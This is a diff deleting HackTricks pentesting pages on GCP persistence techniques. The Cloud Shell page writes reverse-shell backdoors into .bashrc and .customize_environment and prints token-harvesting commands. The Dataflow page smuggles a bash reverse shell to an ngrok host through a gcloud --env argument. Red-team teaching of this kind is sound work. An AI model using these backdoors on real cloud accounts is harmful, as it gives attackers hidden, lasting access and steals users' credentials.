- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md deleted file mode 100644 index ef9829d83..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - App Engine Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Engine - -For more information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### Modify code - -If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence. - -### Old version persistence - -**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md deleted file mode 100644 index 234708928..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md +++ /dev/null @@ -1,67 +0,0 @@ -# GCP - Artifact Registry Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -* What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both? - * The one with the **highest priority set in the virtual repository** is used - * If the **priority is the same**: - * If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used - * If not, the **highest version** is used - -{% hint style="danger" %} -Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority -{% endhint %} - -This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version. - -For persistence these are the steps you need to follow: - -* **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used. -* Create a remote repository if it doesn't exist -* Add the remote repository to the virtual repository -* Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\ - Run something like: - * [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file) -* Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours! - -For more information about dependency confusion check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/dependency-confusion" %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md deleted file mode 100644 index 6aa03016c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - BigQuery Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## BigQuery - -For more information about BigQuery check: - -{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %} -[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md) -{% endcontent-ref %} - -### Grant further access - -Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page: - -{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %} -[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md deleted file mode 100644 index 193e168de..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Cloud Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -For more info about Cloud Functions check: - -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} - -### Persistence Techniques - -* **Modify the code** of the Cloud Function, even just the `requirements.txt` -* **Allow anyone** to call a vulnerable Cloud Function or a backdoor one -* **Trigger** a Cloud Function when something happens to infect something - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md deleted file mode 100644 index 909237bdd..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Cloud Run Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Backdoored Revision - -Create a new backdoored revision of a Run Service and split some traffic to it. - -### Publicly Accessible Service - -Make a Service publicly accessible - -### Backdoored Service or Job - -Create a backdoored Service or Job - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md deleted file mode 100644 index 5f7960285..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md +++ /dev/null @@ -1,98 +0,0 @@ -# GCP - Cloud Shell Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Shell - -For more information check: - -{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %} -[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md) -{% endcontent-ref %} - -### Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org). -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There is **no capabilities for an organisation to monitor** the activity of that instance. - -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing: - -{% code overflow="wrap" %} -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` -{% endcode %} - -There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell: - -```bash -#!/bin/sh -apt-get install netcat -y -nc 443 -e /bin/bash -``` - -{% hint style="warning" %} -It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used. -{% endhint %} - -This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session: - -
- -However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**: - -```bash -gcloud auth print-access-token -gcloud auth application-default print-access-token -``` - -#### How the SSH connection is stablished - -Basically, these 3 API calls are used: - -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell) - -But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) - -## References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) -* [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md deleted file mode 100644 index 1cfe2f833..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloud SQL Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud SQL - -For more information about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Expose the database and whitelist your IP address - -A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\ -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Create a new user / Update users password / Get password of a user - -To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\ -Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\ -Remember that **it's possible to list the users of a database** using GCP API. - -{% hint style="info" %} -You can create/update users using GCP API or from inside the databae if you have enough permissions. -{% endhint %} - -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md deleted file mode 100644 index 06a63c4e9..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Compute Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more informatoin about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### Persistence abusing Instances & backups - -* Backdoor existing VMs -* Backdoor disk images and snapshots creating new versions -* Create new accessible instance with a privileged SA - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md deleted file mode 100644 index 13153856c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Dataflow Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dataflow - -### Invisible persistence in built container - -Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template: - -```bash -git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git -cd python-docs-samples/dataflow/flex-templates/getting_started - -# Create repository where dockerfiles and code is going to be stored -export REPOSITORY=flex-example-python -gcloud storage buckets create gs://$REPOSITORY - -# Create artifact storage -export NAME_ARTIFACT=flex-example-python -gcloud artifacts repositories create $NAME_ARTIFACT \ - --repository-format=docker \ - --location=us-central1 -gcloud auth configure-docker us-central1-docker.pkg.dev - -# Create template -export NAME_TEMPLATE=flex-template -gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ - --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ - --sdk-language "PYTHON" \ - --flex-template-base-image "PYTHON3" \ - --metadata-file "metadata.json" \ - --py-path "." \ - --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ - --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ - --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ - --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ - --region=us-central1 -``` - -**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it. - -Then, next time the job is executed, the compromised container built will be run: - -```bash -# Run template -gcloud dataflow $NAME_TEMPLATE run testing \ - --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ - --parameters=output="gs://$REPOSITORY/out" \ - --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md deleted file mode 100644 index 9710f452c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Filestore Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Give broader access and privileges over a mount - -An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page: - -{% content-ref url="gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
